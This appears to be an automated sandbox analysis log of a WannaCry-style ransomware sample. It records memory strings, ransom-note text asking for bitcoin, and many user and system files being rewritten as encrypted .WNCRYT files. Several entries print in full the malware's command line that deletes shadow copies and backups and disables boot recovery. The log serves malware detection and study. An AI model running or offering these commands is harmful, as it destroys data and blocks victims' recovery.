Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1844791357.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: @WanaDecryptor@.exe	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe, 0000001F.00000000.1847688235.000000000041F000.00000008.00000001.01000000.0000000B.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe, 0000001F.00000000.1847688235.000000000041F000.00000008.00000001.01000000.0000000B.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: @WanaDecryptor@.exe, 0000001F.00000002.5896069022.000000000041F000.00000008.00000001.01000000.0000000B.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet &
Source: @WanaDecryptor@.exe, 0000001F.00000002.5896069022.000000000041F000.00000008.00000001.01000000.0000000B.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet &
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe, 00000022.00000002.1950146110.000000000019B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ^(u/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe, 00000022.00000002.1950146110.000000000019B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ]bwcmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe, 00000022.00000002.1950512162.0000000000555000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietC:\Windows\S\Registry\Machine\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=16OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VB\Registry\Machine\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\GRE_InitializeFamily 6 ModJ
Source: @WanaDecryptor@.exe, 00000022.00000000.1848649309.000000000041F000.00000008.00000001.01000000.0000000B.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe, 00000022.00000000.1848649309.000000000041F000.00000008.00000001.01000000.0000000B.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: @WanaDecryptor@.exe, 00000022.00000002.1950334350.000000000041F000.00000008.00000001.01000000.0000000B.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet &
Source: @WanaDecryptor@.exe, 00000022.00000002.1950334350.000000000041F000.00000008.00000001.01000000.0000000B.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet &
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File moved: C:\Users\user\Desktop\ZTGJILHXQB\ZTGJILHXQB.docx	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File deleted: C:\Users\user\Desktop\ZTGJILHXQB\ZTGJILHXQB.docx	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File moved: C:\Users\user\Desktop\WKXEWIOTXI\ZQIXMVQGAH.mp3	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File deleted: C:\Users\user\Desktop\WKXEWIOTXI\ZQIXMVQGAH.mp3	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File moved: C:\Users\user\Desktop\CURQNKVOIX.docx	Jump to behavior

Writes many files with high entropy

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\65\7ZfXhrEob04xoRhLlPM73qlbsls.gz[1].js.WNCRYT entropy: 7.999492346	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\65\9XrvGJjLDjQS71Khbdm2AEhZanE.gz[1].js.WNCRYT entropy: 7.99990009375	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\65\DFRwL8oOMKucye7OVYoqhw9WuHU.gz[1].js.WNCRYT entropy: 7.99852806032	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\65\GYWlhtp-2KUP3DrEvGq6qAwH9L8.gz[1].js.WNCRYT entropy: 7.99928934548	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\65\Hg6tBRUHG5-aBDi3pWOAYY-0ezY.gz[1].js.WNCRYT entropy: 7.99065781267	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\65\KRGF6ZIGAEc_qQJgueszZZZOzNs.gz[1].js.WNCRYT entropy: 7.99602335513	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb.WNCRYT entropy: 7.99991596672	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\jquery-2.1.1.min[1].js.WNCRYT entropy: 7.99790312384	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\kernel-1e468708[1].js.WNCRYT entropy: 7.99931701922	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx.WNCRYT entropy: 7.99658877482	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx.WNCRYT entropy: 7.99531912625	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx.WNCRYT entropy: 7.99994893925	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664197001416167.txt.WNCRYT entropy: 7.99834860258	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Diagnosis\EventStore.db.WNCRYT entropy: 7.99878990316	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.WNCRYT entropy: 7.99967323319	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\User Account Pictures\user.bmp.WNCRYT entropy: 7.99970571697	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db.WNCRYT entropy: 7.99970466573	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db.WNCRYT entropy: 7.9992467066	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{d17da1ee-054d-4d15-97a5-4869d17ec228}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99681653215	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.WNCRYT entropy: 7.99488254905	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db.WNCRYT entropy: 7.99934028271	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appsconversions.txt.WNCRYT entropy: 7.99989674461	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.WNCRYT entropy: 7.99329018106	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingsconversions.txt.WNCRYT entropy: 7.99961308193	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRYT entropy: 7.99999289774	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingsglobals.txt.WNCRYT entropy: 7.99686955785	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.WNCRYT entropy: 7.99901093373	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingssynonyms.txt.WNCRYT entropy: 7.99840227336	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRYT entropy: 7.99795578302	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{b5f948f2-ed43-4efa-a5e8-c66e8e4b2569}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99904477518	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT entropy: 7.99514153064	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99918109236	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT entropy: 7.99400040219	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_10[1].txt.WNCRYT entropy: 7.99900831863	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT entropy: 7.99866079079	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_11[1].txt.WNCRYT entropy: 7.99514108186	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT entropy: 7.99491866104	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_12[1].txt.WNCRYT entropy: 7.9992070169	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT entropy: 7.99839203232	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_13[1].txt.WNCRYT entropy: 7.99691946201	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT entropy: 7.99335807523	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000003a.db.WNCRYT entropy: 7.99798304158	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db.WNCRYT entropy: 7.99929269309	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_15[1].txt.WNCRYT entropy: 7.99864001722	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db.WNCRYT entropy: 7.99940859269	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_16[1].txt.WNCRYT entropy: 7.99784733723	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.WNCRYT entropy: 7.99967112052	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_18[1].txt.WNCRYT entropy: 7.99850649486	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\en-us.16\stream.x64.en-us.db.WNCRYT entropy: 7.99962499439	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_19[1].txt.WNCRYT entropy: 7.99832041058	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\x-none.16\stream.x64.x-none.db.WNCRYT entropy: 7.99993491877	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_20[1].txt.WNCRYT entropy: 7.99730132449	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\IconCache.db.WNCRYT entropy: 7.99000244951	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_21[1].txt.WNCRYT entropy: 7.9952528617	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRYT entropy: 7.99269961926	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_22[1].txt.WNCRYT entropy: 7.99910028877	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRYT entropy: 7.99985369385	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db.WNCRYT entropy: 7.99642455423	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_24[1].txt.WNCRYT entropy: 7.99621382114	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_25[1].txt.WNCRYT entropy: 7.99516245725	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRYT entropy: 7.99252552707	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_26[1].txt.WNCRYT entropy: 7.99975092602	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRYT entropy: 7.99183268373	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt.WNCRYT entropy: 7.9993901607	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_27[1].txt.WNCRYT entropy: 7.99803440825	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\female_names.txt.WNCRYT entropy: 7.9936065146	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_28[1].txt.WNCRYT entropy: 7.9990024496	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db.WNCRYT entropy: 7.99321870584	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\us_tv_and_film.txt.WNCRYT entropy: 7.99884679638	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_29[1].txt.WNCRYT entropy: 7.99018623416	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.29.4\LICENSE.txt.WNCRYT entropy: 7.99272832834	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_2[1].txt.WNCRYT entropy: 7.997611921	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_3[1].txt.WNCRYT entropy: 7.99129357087	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRYT entropy: 7.99984484155	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\64\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_4[1].txt.WNCRYT entropy: 7.99184419324	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRYT entropy: 7.99995761053	Jump to dropped file
